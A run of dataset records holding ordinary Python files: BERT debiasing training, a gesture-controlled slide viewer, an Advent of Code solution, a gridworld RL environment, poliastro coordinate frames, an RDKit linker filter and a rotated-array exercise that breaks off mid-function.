        if args.local_rank != -1:\n            num_train_optimization_steps = num_train_optimization_steps // torch.distributed.get_world_size()\n\n    # Prepare model\n    cache_dir = args.cache_dir if args.cache_dir else os.path.join(str(PYTORCH_PRETRAINED_BERT_CACHE),\n                                                                   'distributed_{}'.format(args.local_rank))\n\n    model = BertWithDebiasLoss.from_pretrained(\n        args.bert_model, cache_dir=cache_dir, num_labels=3, loss_fn=loss_fn)\n\n    if args.fp16:\n        model.half()\n    model.to(device)\n    if args.local_rank != -1:\n        try:\n            from apex.parallel import DistributedDataParallel as DDP\n        except ImportError:\n            raise ImportError(\n                \"Please install apex from https://www.github.com/nvidia/apex to use distributed and fp16 training.\")\n\n        model = DDP(model)\n    elif n_gpu > 1:\n        model = torch.nn.DataParallel(model)\n\n    # Prepare optimizer\n    param_optimizer = list(model.named_parameters())\n    no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']\n    optimizer_grouped_parameters = [\n        {'params': [p for n, p in param_optimizer if not any(nd in n for nd in no_decay)], 'weight_decay': 0.01},\n        {'params': [p for n, p in param_optimizer if any(nd in n for nd in no_decay)], 'weight_decay': 0.0}\n    ]\n    if args.fp16:\n        try:\n            from apex.optimizers import FP16_Optimizer\n            from apex.optimizers import FusedAdam\n        except ImportError:\n            raise ImportError(\n                \"Please install apex from https://www.github.com/nvidia/apex to use distributed and fp16 training.\")\n\n        optimizer = FusedAdam(optimizer_grouped_parameters,\n                              lr=args.learning_rate,\n                              bias_correction=False,\n                              max_grad_norm=1.0)\n        if args.loss_scale == 0:\n            optimizer = FP16_Optimizer(optimizer, dynamic_loss_scale=True)\n        else:\n            optimizer = FP16_Optimizer(optimizer, static_loss_scale=args.loss_scale)\n\n    else:\n        optimizer = BertAdam(optimizer_grouped_parameters,\n                             lr=args.learning_rate,\n                             warmup=args.warmup_proportion,\n                             t_total=num_train_optimization_steps)\n\n    global_step = 0\n    nb_tr_steps = 0\n    tr_loss = 0\n\n    if args.do_train:\n        train_features: List[InputFeatures] = convert_examples_to_features(\n            train_examples, args.max_seq_length, tokenizer, args.n_processes)\n\n        bias_map = load_bias(\"train\")\n        for fe in train_features:\n            fe.bias = bias_map[fe.example_id].astype(np.float32)\n\n        logging.info(\"***** Running training *****\")\n        logging.info(\"  Num examples = %d\", len(train_examples))\n        logging.info(\"  Batch size = %d\", args.train_batch_size)\n        logging.info(\"  Num steps = %d\", num_train_optimization_steps)\n\n        train_dataloader = build_train_dataloader(train_features, args.train_batch_size, args.seed, args.sorted)\n\n        model.train()\n        loss_ema = 0\n        total_steps = 0\n        decay = 0.99\n\n        for _ in trange(int(args.num_train_epochs), desc=\"Epoch\", ncols=100):\n            tr_loss = 0\n            nb_tr_examples, nb_tr_steps = 0, 0\n            pbar = tqdm(train_dataloader, desc=\"loss\", ncols=100)\n            for step, batch in enumerate(pbar):\n                batch = tuple(t.to(device) for t in batch)\n                if bias_map is not None:\n                    input_ids, input_mask, segment_ids, label_ids, bias = batch\n                else:\n                    bias = None\n                    input_ids, input_mask, segment_ids, label_ids = batch\n\n                logits, loss = model(input_ids, segment_ids, input_mask, label_ids, bias)\n\n                total_steps += 1\n                loss_ema = loss_ema * decay + loss.cpu().detach().numpy() * (1 - decay)\n                descript = \"loss=%.4f\" % (loss_ema / (1 - decay**total_steps))\n                pbar.set_description(descript, refresh=False)\n\n                if n_gpu > 1:\n                    loss = loss.mean()  # mean() to average on multi-gpu.\n                if args.gradient_accumulation_steps > 1:\n                    loss = loss / args.gradient_accumulation_steps\n
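# The division just above is one half of the usual gradient-accumulation pattern: scale each
# micro-batch loss down, let backward() add gradients up, and step the optimizer only every
# accum_steps micro-batches (the optimizer.step() call follows further below). A minimal
# self-contained sketch of the same idea, with illustrative names:
import torch

def train_with_accumulation(model, optimizer, loss_fn, batches, accum_steps=4):
    optimizer.zero_grad()
    for step, (x, y) in enumerate(batches):
        loss = loss_fn(model(x), y) / accum_steps  # keep the effective loss an average
        loss.backward()                            # gradients accumulate in the .grad buffers
        if (step + 1) % accum_steps == 0:
            optimizer.step()                       # one update per accum_steps micro-batches
            optimizer.zero_grad()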
\n                if args.fp16:\n                    optimizer.backward(loss)\n                else:\n                    loss.backward()\n\n                tr_loss += loss.item()\n                nb_tr_examples += input_ids.size(0)\n                nb_tr_steps += 1\n                if (step + 1) % args.gradient_accumulation_steps == 0:\n                    if args.fp16:\n                        # modify learning rate with special warm up BERT uses\n                        # if args.fp16 is False, BertAdam is used that handles this automatically\n                        lr_this_step = args.learning_rate * warmup_linear(global_step / num_train_optimization_steps,\n                                                                          args.warmup_proportion)\n                        for param_group in optimizer.param_groups:\n                            param_group['lr'] = lr_this_step\n                    optimizer.step()\n                    optimizer.zero_grad()\n                    global_step += 1\n\n        # Save a trained model and the associated configuration\n        model_to_save = model.module if hasattr(model, 'module') else model  # Only save the model itself\n        output_model_file = os.path.join(output_dir, WEIGHTS_NAME)\n        torch.save(model_to_save.state_dict(), output_model_file)\n        output_config_file = os.path.join(output_dir, CONFIG_NAME)\n        with open(output_config_file, 'w') as f:\n            f.write(model_to_save.config.to_json_string())\n\n        # Record the args as well\n        arg_dict = {}\n        for arg in vars(args):\n            arg_dict[arg] = getattr(args, arg)\n        with open(join(output_dir, \"args.json\"), 'w') as out_fh:\n            json.dump(arg_dict, out_fh)\n\n        # Load a trained model and config that you have fine-tuned\n        config = BertConfig(output_config_file)\n        model = BertWithDebiasLoss(config, num_labels=3, loss_fn=loss_fn)\n        model.load_state_dict(torch.load(output_model_file))\n    else:\n        output_config_file = os.path.join(output_dir, CONFIG_NAME)\n        config = BertConfig.from_json_file(output_config_file)\n        output_model_file = os.path.join(output_dir, WEIGHTS_NAME)\n        model = BertWithDebiasLoss(config, num_labels=3, loss_fn=loss_fn)\n        model.load_state_dict(torch.load(output_model_file))\n\n    model.to(device)\n\n    if not args.do_eval:\n        return\n    if not (args.local_rank == -1 or torch.distributed.get_rank() == 0):\n        return\n\n    model.eval()\n\n    eval_datasets = [(\"dev\", load_mnli(False)), (\"hans\", load_hans())]\n    for name, eval_examples in eval_datasets:\n        logging.info(\"***** Running evaluation on %s *****\" % name)\n        logging.info(\"  Num examples = %d\", len(eval_examples))\n        logging.info(\"  Batch size = %d\", args.eval_batch_size)\n        eval_features = convert_examples_to_features(\n            eval_examples, args.max_seq_length, tokenizer)\n        eval_features.sort(key=lambda x: len(x.input_ids))\n        all_label_ids = np.array([x.label_id for x in eval_features])\n        eval_dataloader = build_eval_dataloader(eval_features, args.eval_batch_size)\n\n        eval_loss = 0\n        nb_eval_steps = 0\n        probs = []\n\n        for input_ids, input_mask, segment_ids, label_ids in tqdm(eval_dataloader, desc=\"Evaluating\", ncols=100):\n            input_ids = input_ids.to(device)\n            input_mask = input_mask.to(device)\n            segment_ids = segment_ids.to(device)\n            label_ids = label_ids.to(device)\n\n            with torch.no_grad():\n                logits = model(input_ids, segment_ids, input_mask)\n\n            # create eval loss and other metric required by the task\n            loss_fct = CrossEntropyLoss()\n            tmp_eval_loss = loss_fct(logits.view(-1, 3), label_ids.view(-1))\n\n            eval_loss += tmp_eval_loss.mean().item()\n            nb_eval_steps += 1\n            probs.append(torch.nn.functional.softmax(logits, 1).detach().cpu().numpy())\n\n        probs = np.concatenate(probs, 0)\n        eval_loss = eval_loss / nb_eval_steps\n\n        if name == \"hans\":\n            probs[:, 0] += probs[:, 2]\n            probs = probs[:, :2]\n\n        preds = np.argmax(probs, axis=1)\n\n        result = {\"acc\": simple_accuracy(preds, all_label_ids)}\n
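# For context: the "hans" branch a few lines above folds the three-way NLI distribution into
# the two-way entailment/non-entailment split that HANS is scored on. The same fold in
# isolation (that entailment sits at index 1 is an assumption here; it has to match the
# model's label map):
import numpy as np

def collapse_to_hans(probs3):
    out = probs3[:, :2].copy()
    out[:, 0] += probs3[:, 2]  # merge the second non-entailment class into the first
    return out                 # columns: [non-entailment, entailment]

assert np.allclose(collapse_to_hans(np.array([[0.2, 0.5, 0.3]])), [[0.5, 0.5]])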
        loss = tr_loss / nb_tr_steps if args.do_train else None\n\n        result['eval_loss'] = eval_loss\n        result['global_step'] = global_step\n        result['loss'] = loss\n\n        output_eval_file = os.path.join(output_dir, \"eval_%s_results.txt\" % name)\n        with open(output_eval_file, \"w\") as writer:\n            logging.info(\"***** Eval results *****\")\n            for key in sorted(result.keys()):\n                logging.info(\"  %s = %s\", key, str(result[key]))\n                writer.write(\"%s = %s\\n\" % (key, str(result[key])))\n\n        output_answer_file = os.path.join(output_dir, \"eval_%s_answers.json\" % name)\n        answers = {ex.example_id: [float(x) for x in p] for ex,p in zip(eval_features, probs)}\n        with open(output_answer_file, \"w\") as f:\n            json.dump(answers, f)\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"chrisc36/debias","sub_path":"debias/bert/train_bert.py","file_name":"train_bert.py","file_ext":"py","file_size_in_byte":26020,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"21"}
{"seq_id":"3391530961","text":"import os\n\nimport cv2\nfrom cvzone.HandTrackingModule import HandDetector\nimport numpy as np\n\n# Variables\nwidth, height = 1280, 720\n\nfolderPath = \"presentation\"\n\ncap = cv2.VideoCapture(0)\ncap.set(3, width)\ncap.set(4, height)\n\n\npathImages = sorted(os.listdir(folderPath), key=len)\n\n# state variables\nimgNumber = 0\nhs, ws = int(120*1), int(213*1)\ngestureThreshold = 300\n\nbuttonPress = False\nbuttonCounter = 0\nbuttonDelay = 10\nannotations = [[]]\nann_counter = -1\nann_start = False\n\ndetector = HandDetector(detectionCon=0.8, maxHands=1)\n\n\nwhile True:\n    success, img = cap.read()\n    img = cv2.flip(img, 1)\n\n    pathFullImage = os.path.join(folderPath, pathImages[imgNumber])\n    imgCurrent = cv2.imread(pathFullImage)\n    h, w, _ = imgCurrent.shape  # slide size; must be known before the finger mapping below\n\n    hands, img = detector.findHands(img)\n    cv2.line(img, (0, gestureThreshold), (width, gestureThreshold), (0, 255, 0), 10)\n\n    if hands and not buttonPress:\n        hand = hands[0]\n        fingers = detector.fingersUp(hand)\n        cx,cy = hand['center']\n\n        lmList = hand['lmList']\n\n        #constrain values for easier drawing\n        indexFinger = lmList[8][0], lmList[8][1]\n        xVal = int(np.interp(lmList[8][0], [width//2, w-50], [0, width]))\n        yVal = int(np.interp(lmList[8][1], [200, height-200], [0, h]))\n        indexFinger = xVal, yVal\n\n        #Gestures\n        if cy <= gestureThreshold:\n            ann_start = False\n            #Gesture 1 - Left slide\n            if fingers == [1, 0, 0, 0, 0]:\n                ann_start = False\n                if imgNumber > 0:\n                    print('left')\n                    annotations = [[]]\n                    ann_counter = -1\n                    buttonPress = True\n                    imgNumber -= 1\n\n            #Gesture 2 - Right slide\n            if fingers == [0, 0, 0, 0, 1]:\n                ann_start = False\n                if imgNumber < len(pathImages) - 1:\n                    print('right')\n                    annotations = [[]]\n                    ann_counter = -1 \n                    buttonPress = True\n                    imgNumber += 1\n        \n        #Gesture 3 - show pointer\n        if fingers == [0, 1, 1, 0, 0]:\n            cv2.circle(imgCurrent, indexFinger, 12, (0, 0, 255), cv2.FILLED)\n            ann_start = False\n        \n        # Gesture 4 - draw\n        if fingers == [0, 1, 0, 0, 0]:\n            if not ann_start:\n                ann_start = True\n                ann_counter += 1\n                annotations.append([])\n            cv2.circle(imgCurrent, indexFinger, 12, (0, 0, 255), cv2.FILLED)\n            annotations[ann_counter].append(indexFinger)\n        else:\n            ann_start = False\n        \n        #Gesture 5 - erase the last annotation\n        if fingers == [0, 1, 1, 1, 0]:\n            if annotations:\n                annotations.pop(-1)\n                if ann_counter > 0:\n                    ann_counter -= 1\n                buttonPress = True\n        \n        # Gesture 6 - erase all annotations\n        if fingers == [0, 1, 1, 1, 1]:\n            annotations = [[]]\n            ann_counter = 0\n            buttonPress = True\n    else:\n        ann_start = False\n\n    #button press delay mechanic\n
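# The buttonPress flag set by the gestures above feeds the frame-based debounce right below:
# once a gesture fires, further gestures are ignored for buttonDelay frames. The same mechanic
# as a reusable helper (a sketch; the class name and threshold are illustrative):
class GestureDebounce:
    def __init__(self, delay_frames=10):
        self.delay_frames = delay_frames
        self.cooldown = 0

    def fire(self):
        # Returns True only when the cooldown has fully elapsed, then re-arms it.
        if self.cooldown == 0:
            self.cooldown = self.delay_frames
            return True
        return False

    def tick(self):
        # Call once per captured frame to count the cooldown down.
        if self.cooldown > 0:
            self.cooldown -= 1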
    if buttonPress:\n        buttonCounter += 1\n        if buttonCounter > buttonDelay:\n            buttonCounter = 0\n            buttonPress = False\n\n    for i in range(len(annotations)):\n        for j in range(len(annotations[i])):\n            if j != 0:\n                cv2.line(imgCurrent, annotations[i][j-1], annotations[i][j], (0, 0, 200), 12)\n\n    imgSmall = cv2.resize(img, (ws, hs))\n    h, w, _ = imgCurrent.shape\n    imgCurrent[0:hs, w-ws:w] = imgSmall\n\n    cv2.imshow(\"Presentation\", imgCurrent)\n    cv2.imshow(\"Image\", img)\n\n    key = cv2.waitKey(1)\n    if key == ord('q'):\n        break\n","repo_name":"aryan0821/gesture-presentation","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"5550783030","text":"#In[0]\nimport pandas as pd\nsignals = pd.read_table(\"input8.txt\", sep=' \\\\| | ', header=None, engine='python')\n#In[1]\ncheck_values = [2, 3, 4, 7]\npart1 = 0\nfor outputs in signals.values[:,10:14]:\n    for output in outputs:\n        if len(output) in check_values:\n            part1 += 1\nprint(\"Solution to part 1: \", part1)\n#In[2]\nrunning_running_total = 0\nfor entry in signals.values:\n    for signal in entry:\n        if len(signal) == 2:\n            cf = list(signal)\n        elif len(signal) == 4:\n            bd = list(signal)\n        elif len(signal) == 3:\n            a = list(signal)\n    a = [element for element in a if element not in bd]\n    bd = [element for element in bd if element not in cf]\n    eg = [element for element in 'abcdefg' if element not in cf+a+bd]\n    #Consider this decrypting the substitution cipher. Please\n    running_total = ''\n    for codes in entry[10:14]:\n        if len(codes) == 2:\n            running_total += '1'\n        elif len(codes) == 3:\n            running_total += '7'\n        elif len(codes) == 4:\n            running_total += '4'\n        elif len(codes) == 5:\n            if cf[0] in codes and cf[1] in codes:\n                running_total += '3'\n            elif not(bd[0] in codes and bd[1] in codes):\n                running_total += '2'\n            else:\n                running_total += '5'\n        elif len(codes) == 6:\n            if not(cf[0] in codes) or not(cf[1] in codes):\n                running_total += '6'\n            elif not(bd[0] in codes) or not(bd[1] in codes):\n                running_total += '0'\n            else:\n                running_total += '9'\n        else:\n            running_total += '8'\n    running_running_total += int(running_total)\nprint(\"Solution to part 2: \", running_running_total)\n\n# %%\n","repo_name":"bethsg/AOC_2021","sub_path":"Day8/day8.py","file_name":"day8.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"72863294772","text":"from onpolicy.envs.gridworld.gym_minigrid.minigrid import *\nfrom icecream import ic\nimport collections\nimport math\nfrom copy import deepcopy\n\nclass HumanEnv(MiniGridEnv):\n    \"\"\"\n    Environment in which the agent is instructed to go to a given object\n    named using an English text string\n    \"\"\"\n\n    def __init__(\n        self,\n        num_agents=2,\n        num_preies=2,\n        num_obstacles=4,\n        direction_alpha=0.5,\n        use_direction_reward = False,\n        use_human_command=False,\n        coverage_discounter=0.1,\n        size=19\n    ):\n        self.size = size\n        self.num_preies = num_preies\n        self.use_direction_reward = use_direction_reward\n        self.direction_alpha = direction_alpha\n        self.use_human_command = use_human_command\n        self.coverage_discounter = coverage_discounter\n        # initialize the covering rate\n        self.covering_rate = 0\n        # initialize the episode counters reported via step() info so they exist before first use\n        self.num_reach_goal = 0\n        self.num_same_direction = 0\n        # Reduce obstacles if there are too many\n        if num_obstacles <= size/2 + 1:\n            self.num_obstacles = int(num_obstacles)\n        else:\n            self.num_obstacles = int(size/2)\n\n        super().__init__(\n            num_agents=num_agents,\n            
grid_size=size,\n max_steps=math.floor(((size-2)**2) / num_agents * 2),\n # Set this to True for maximum speed\n see_through_walls=True\n )\n\n def _gen_grid(self, width, height):\n # Create the grid\n self.grid = Grid(width, height)\n\n # Generate the surrounding walls\n self.grid.horz_wall(0, 0)\n self.grid.horz_wall(0, height - 1)\n self.grid.vert_wall(0, 0)\n self.grid.vert_wall(width - 1, 0)\n\n room_w = width // 2\n room_h = height // 2\n\n # For each row of rooms\n for j in range(0, 2):\n\n # For each column\n for i in range(0, 2):\n xL = i * room_w\n yT = j * room_h\n xR = xL + room_w\n yB = yT + room_h\n\n # Bottom wall and door\n if i + 1 < 2:\n self.grid.vert_wall(xR, yT, room_h)\n pos = (xR, self._rand_int(yT + 1, yB))\n self.grid.set(*pos, None)\n\n # Bottom wall and door\n if j + 1 < 2:\n self.grid.horz_wall(xL, yB, room_w)\n pos = (self._rand_int(xL + 1, xR), yB)\n self.grid.set(*pos, None)\n\n # initial the cover_grid\n self.cover_grid = np.zeros([width,height])\n for j in range(0, height):\n for i in range(0, width):\n if self.grid.get(i,j) != None and self.grid.get(i,j).type == 'wall':\n self.cover_grid[j,i] = 1.0\n self.cover_grid_initial = self.cover_grid.copy()\n self.num_none = collections.Counter(self.cover_grid_initial.flatten())[0.]\n # import pdb; pdb.set_trace()\n\n # Types and colors of objects we can generate\n types = ['key']\n\n objs = []\n objPos = []\n\n # Until we have generated all the objects\n while len(objs) < self.num_preies:\n objType = self._rand_elem(types)\n objColor = self._rand_elem(COLOR_NAMES)\n\n # If this object already exists, try again\n if (objType, objColor) in objs:\n continue\n\n if objType == 'key':\n obj = Key(objColor)\n elif objType == 'box':\n obj = Box(objColor)\n elif objType == 'ball':\n obj = Ball(objColor)\n\n pos = self.place_obj(obj)\n objs.append((objType, objColor))\n objPos.append(pos)\n\n # Place obstacles\n self.obstacles = []\n for i_obst in range(self.num_obstacles):\n self.obstacles.append(Obstacle())\n pos = self.place_obj(self.obstacles[i_obst], max_tries=100)\n\n self.occupy_grid = self.grid.copy()\n # Randomize the agent start position and orientation\n self.place_agent()\n\n # Choose a random object to be picked up\n objIdx = self._rand_int(0, len(objs))\n self.targetType, self.target_color = objs[objIdx]\n self.target_pos = objPos[objIdx]\n \n # direction\n array_direction = np.array([[0,1], [0,-1], [1,0], [-1,0], [1,1], [1,-1], [-1,1], [-1,-1]])\n self.direction = []\n self.direction_encoder = []\n self.direction_index = []\n for agent_id in range(self.num_agents):\n center_pos = np.array([int((self.size-1)/2),int((self.size-1)/2)])\n direction = np.sign(center_pos - self.agent_pos[agent_id])\n direction_index = np.argmax(np.all(np.where(array_direction == direction, True, False), axis=1))\n direction_encoder = np.eye(8)[direction_index]\n self.direction_index.append(direction_index)\n self.direction.append(direction)\n self.direction_encoder.append(direction_encoder)\n\n # text\n descStr = '%s %s' % (self.target_color, self.targetType)\n self.mission = 'go to the %s' % descStr\n # print(self.mission)\n\n def step(self, action):\n obs, reward, done, info = MiniGridEnv.step(self, action)\n \n rewards = []\n\n for agent_id in range(self.num_agents):\n ax, ay = self.agent_pos[agent_id]\n tx, ty = self.target_pos\n if self.cover_grid[ay,ax] == 0:\n reward += self.coverage_discounter\n self.cover_grid[ay, ax] = 1.0\n self.covering_rate = collections.Counter((self.cover_grid - self.cover_grid_initial).flatten())[1] 
/ self.num_none\n\n # if abs(ax - tx) < 1 and abs(ay - ty) < 1:\n # reward += 1.0 \n # self.num_reach_goal += 1\n # # done = True\n \n rewards.append(reward)\n\n rewards = [[np.sum(rewards)]] * self.num_agents\n\n dones = [done for agent_id in range(self.num_agents)]\n \n info['num_reach_goal'] = self.num_reach_goal\n info['covering_rate'] = self.covering_rate\n info['num_same_direction'] = self.num_same_direction\n\n return obs, rewards, dones, info\n\n\n\n","repo_name":"yang-xy20/async_mappo","sub_path":"onpolicy/envs/gridworld/gym_minigrid/envs/human.py","file_name":"human.py","file_ext":"py","file_size_in_byte":6209,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"7721796032","text":"from astropy import units as u\nfrom astropy.coordinates import (\n GCRS as _GCRS,\n HCRS as _HCRS,\n ICRS as _ICRS,\n AffineTransform,\n BaseRADecFrame,\n CartesianDifferential,\n FunctionTransformWithFiniteDifference,\n TimeAttribute,\n UnitSphericalRepresentation,\n frame_transform_graph,\n get_body_barycentric,\n get_body_barycentric_posvel,\n)\nfrom astropy.coordinates.builtin_frames.utils import DEFAULT_OBSTIME\nimport numpy as np\n\nfrom poliastro.bodies import (\n Jupiter,\n Mars,\n Mercury,\n Moon,\n Neptune,\n Saturn,\n Uranus,\n Venus,\n)\n\n__all__ = [\n \"ICRS\",\n \"HCRS\",\n \"MercuryICRS\",\n \"VenusICRS\",\n \"GCRS\",\n \"MarsICRS\",\n \"JupiterICRS\",\n \"SaturnICRS\",\n \"UranusICRS\",\n \"NeptuneICRS\",\n]\n\n# HACK: sphinx-autoapi variable definition\nICRS = _ICRS\nHCRS = _HCRS\nGCRS = _GCRS\n\n\nclass _PlanetaryICRS(BaseRADecFrame):\n obstime = TimeAttribute(default=DEFAULT_OBSTIME)\n\n def __new__(cls, *args, **kwargs):\n frame_transform_graph.transform(AffineTransform, cls, ICRS)(\n cls.to_icrs\n )\n frame_transform_graph.transform(AffineTransform, ICRS, cls)(\n cls.from_icrs\n )\n frame_transform_graph.transform(\n FunctionTransformWithFiniteDifference, cls, cls\n )(cls.self_transform)\n\n return super().__new__(cls)\n\n @staticmethod\n def to_icrs(planet_coo, _):\n # This is just an origin translation so without a distance it cannot go ahead\n if isinstance(planet_coo.data, UnitSphericalRepresentation):\n raise u.UnitsError(\n _NEED_ORIGIN_HINT.format(planet_coo.__class__.__name__)\n )\n\n if planet_coo.data.differentials:\n bary_sun_pos, bary_sun_vel = get_body_barycentric_posvel(\n planet_coo.body.name, planet_coo.obstime\n )\n bary_sun_pos = bary_sun_pos.with_differentials(\n bary_sun_vel.represent_as(CartesianDifferential)\n )\n\n else:\n bary_sun_pos = get_body_barycentric(\n planet_coo.body.name, planet_coo.obstime\n )\n bary_sun_vel = None\n\n return None, bary_sun_pos\n\n @staticmethod\n def from_icrs(icrs_coo, planet_frame):\n # This is just an origin translation so without a distance it cannot go ahead\n if isinstance(icrs_coo.data, UnitSphericalRepresentation):\n raise u.UnitsError(\n _NEED_ORIGIN_HINT.format(icrs_coo.__class__.__name__)\n )\n\n if icrs_coo.data.differentials:\n bary_sun_pos, bary_sun_vel = get_body_barycentric_posvel(\n planet_frame.body.name, planet_frame.obstime\n )\n # Beware! 
Negation operation is not supported for differentials\n bary_sun_pos = (-bary_sun_pos).with_differentials(\n -bary_sun_vel.represent_as(CartesianDifferential)\n )\n\n else:\n bary_sun_pos = -get_body_barycentric(\n planet_frame.body.name, planet_frame.obstime\n )\n bary_sun_vel = None\n\n return None, bary_sun_pos\n\n @staticmethod\n def self_transform(from_coo, to_frame):\n if np.all(from_coo.obstime == to_frame.obstime):\n return to_frame.realize_frame(from_coo.data)\n else:\n # Like CIRS, we do this self-transform via ICRS\n return from_coo.transform_to(ICRS).transform_to(to_frame)\n\n\nclass MercuryICRS(_PlanetaryICRS):\n body = Mercury\n\n\nclass VenusICRS(_PlanetaryICRS):\n body = Venus\n\n\nclass MarsICRS(_PlanetaryICRS):\n body = Mars\n\n\nclass JupiterICRS(_PlanetaryICRS):\n body = Jupiter\n\n\nclass SaturnICRS(_PlanetaryICRS):\n body = Saturn\n\n\nclass UranusICRS(_PlanetaryICRS):\n body = Uranus\n\n\nclass NeptuneICRS(_PlanetaryICRS):\n body = Neptune\n\n\nclass MoonICRS(_PlanetaryICRS):\n body = Moon\n\n\n_NEED_ORIGIN_HINT = (\n \"The input {0} coordinates do not have length units. This \"\n \"probably means you created coordinates with lat/lon but \"\n \"no distance. PlanetaryICRS<->ICRS transforms cannot \"\n \"function in this case because there is an origin shift.\"\n)\n","repo_name":"poliastro/poliastro","sub_path":"src/poliastro/frames/equatorial.py","file_name":"equatorial.py","file_ext":"py","file_size_in_byte":4174,"program_lang":"python","lang":"en","doc_type":"code","stars":806,"dataset":"github-code","pt":"21"} +{"seq_id":"20885372815","text":"\nfrom rdkit import Chem\nfrom rdkit.Chem import Descriptors\nfrom rdkit import DataStructs\nimport re\nfrom rdkit import RDLogger\nfrom rdkit.Chem import AllChem\nRDLogger.DisableLog('rdApp.*')\n\nimport argparse\nimport numpy as np\nimport operator\n\n\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-i', '--ifile', type=str, required=True,\n help='generation_linker_descriptor.tsv')\nparser.add_argument('-o', '--ofile', type=str, required=True,\n help='')\nargs = parser.parse_args()\n\n\n\n\ndef pass_filter(linker_, natoms_):\n print(Chem.rdMolDescriptors.CalcNumHeteroatoms(Chem.MolFromSmiles('*')))\n mol = Chem.MolFromSmiles(linker_)\n keep = True\n if mol is not None:\n n_aliphatic_ring = Descriptors.NumAliphaticRings(mol)\n n_aromatic_ring = Descriptors.NumAromaticRings(mol)\n n_ring = (max(n_aliphatic_ring, n_aromatic_ring))\n #print('n_aliphatic_ring', n_aliphatic_ring)\n #print('n_aromatic_ring', n_aromatic_ring)\n if n_ring < 1:\n n_heteroatoms = Chem.rdMolDescriptors.CalcNumHeteroatoms(mol) - 2 # remove attachments *\n # should be\n # no significant change in R1 selection: 141125 --> 141049\n #n_heteroatoms = Chem.rdMolDescriptors.CalcNumHeteroatoms(mol) - linker_.count('*') # remove attachments *\n\n if n_heteroatoms < 1:\n bonds_type = [b.GetBondType() for b in mol.GetBonds()]\n #print(bonds_type)\n if all([btype == Chem.rdchem.BondType.SINGLE for btype in bonds_type]) and natoms_ > 2:\n keep = False\n\n return keep\n\n\n\n\n\n\n\ndiscarded = []\nwith open(args.ifile, 'r') as f:\n for l in f:\n if l.startswith('gen'):\n continue\n cols = l.split('\\n')[0].split('\\t')\n gen = cols[0]\n gen_id = int(cols[1])\n gen_atom = int(cols[7])\n linker = cols[8]\n rot = int(cols[9])\n atom = int(cols[10])\n if gen_atom < atom: # wrong linkers including fragments\n #print(gen, '\\t', linker)\n continue\n\n \n if rot == atom-1 and atom > 3: # purely linear linkers\n discarded.append((gen_id, gen, linker))\n 
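# Aside: the linearity test above trusts the pre-computed rot/atom columns of the input table.
# The same property can be recomputed from the linker SMILES with RDKit alone (a sketch; it
# treats the * attachment dummies like ordinary atoms, which may differ from the table's counts):
from rdkit import Chem

def is_unbranched_chain(smiles):
    mol = Chem.MolFromSmiles(smiles)
    if mol is None:
        return False
    if mol.GetRingInfo().NumRings() > 0:  # any ring disqualifies a pure chain
        return False
    degrees = [atom.GetDegree() for atom in mol.GetAtoms()]
    return mol.GetNumAtoms() > 3 and max(degrees) <= 2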
#print(gen, linker)\n            #continue\n\n\n        if not pass_filter(linker, atom): # not purely linear but no ring or no heteroatom\n            # branched linkers only composed of more than 3 carbon atoms\n            discarded.append((gen_id, gen, linker)) \n            #print(gen, linker)\n            #continue\nprint('discarded', len(discarded))\n\n\n\nwith open(args.ofile, 'w') as of:\n    of.write('gen_id\\tgen\\tlinker\\n')\n    for gen_id, gen, linker in discarded:\n        of.write('{}\\t{}\\t{}\\n'.format(gen_id, gen, linker))\n\n","repo_name":"kimeguida/POEM","sub_path":"scripts/filter_linker.py","file_name":"filter_linker.py","file_ext":"py","file_size_in_byte":2782,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"21"}
{"seq_id":"20885372815","text":"#!/usr/bin/env python\n#-*- coding:utf-8 -*-\n# author:wttree\n# datetime:2018/10/20 21:53\n# software: PyCharm\n# question: Minimum number in a rotated array\n\n'''\nMoving some number of leading elements of an array to its end is called a rotation of the array.\nGiven a rotation of an increasingly sorted array, output the minimum element of the rotated array.\nFor example, the array {3,4,5,1,2} is a rotation of {1,2,3,4,5}, and the minimum of that array is 1.\nNOTE: all the given elements are greater than 0; if the array size is 0, return 0.\n'''\n'''\nSolve this problem with binary search:\nmid = low + (high - low)/2\nThree cases have to be considered:\n(1) array[mid] > array[high]:\nThis happens for arrays like [3,4,5,6,0,1,2]; the minimum must then be to the right of mid.\nlow = mid + 1\n(2) array[mid] == array[high]:\nThis happens for arrays like [1,0,1,1,1] or [1,1,1,0,1]; here it is hard to tell whether the minimum\nis to the left or to the right of mid, so the range can only be narrowed one element at a time:\nhigh = high - 1\n(3) array[mid] < array[high]:\nThis happens for arrays like [2,2,3,4,5,6,6]; the minimum must then be array[mid] itself or lie to\nthe left of mid, because everything to the right is necessarily increasing.\nhigh = mid\nBeware of a pitfall here: if only two numbers are left in the range to search, mid always points to\nthe one with the smaller index. For example with array = [4,6]:\narray[low] = 4 ;array[mid] = 4 ; array[high] = 6 ;\nhigh = mid - 1 would therefore be wrong, so high = mid must be used,\nwhile low = mid + 1 in case (1) causes no such error.\n'''\nclass Solution:\n\n    #v1.0 treat the non-decreasing order as increasing or flat; the minimum can only be the first\n    #element or the element where the rotation starts\n    #663ms 5732k\n    def minNumberInRotateArray(self, rotateArray):\n        if rotateArray == []:\n            return 0\n        min = rotateArray[0]\n        for i in range(1, len(rotateArray)):\n            if rotateArray[i] < min:\n                min = rotateArray[i]\n        return min\n\n    #551ms 5856k\n    '''\n    A variant of binary search. Note that the first element of the rotated array is never smaller\n    than its last element; pick a middle point.\n    If the middle element is greater than the first one, the minimum lies in the second half; if the\n    middle element is smaller than the last one, the minimum lies in the first half. Loop this way.\n    Also, if within one iteration the first element is smaller than the last one, the minimum is the\n    first element itself.\n    But when the first, the last and the middle elements are all equal, that region can only be\n    searched sequentially.\n    '''\n    def minNumberInRotateArray2(self, rotateArray):\n        if len(rotateArray) == 0:\n            return 0\n        front = 0\n        rear = len(rotateArray) -1\n        minVal = rotateArray[0]\n\n        